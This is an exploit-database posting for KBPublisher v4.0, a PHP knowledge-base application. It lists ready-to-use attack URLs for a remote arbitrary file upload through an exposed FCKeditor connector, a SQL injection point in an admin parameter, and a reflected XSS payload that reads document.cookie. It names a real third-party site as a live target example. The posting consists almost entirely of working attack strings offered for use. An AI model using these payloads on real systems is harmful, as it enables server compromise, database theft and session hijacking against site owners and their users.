KBPublisher v4.0 Multiple Vulnerabilties

2012-06-07T00:00:00
ID 1337DAY-ID-18467
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            KBPublisher v4.0  Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.kbpublisher.com/
.:. Tested On Demo : http://demo.kbpublisher.com/kb/admin
#######################################################################

===[ Exploit ]===


Remote Arbitrary File Upload
=============================

http://SITE/admin/tools/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://SITE/admin/tools/FCKeditor/editor/filemanager/connectors/php/connector.php

Your File:
http://SITE/images/image/


Sql Injection
==============

http://SITE/admin/index.php?module=knowledgebase&page=kb_entry&action=update&id=191[sql]


Reflected Xss
==============


https://SITE/?&sid="><script>alert(document.cookie)</script>

Example:

https://wfsm.webfarm.co.nz/kb/?&sid="><script>alert(document.cookie)</script>


####################################################################### 



#  0day.today [2016-04-19]  #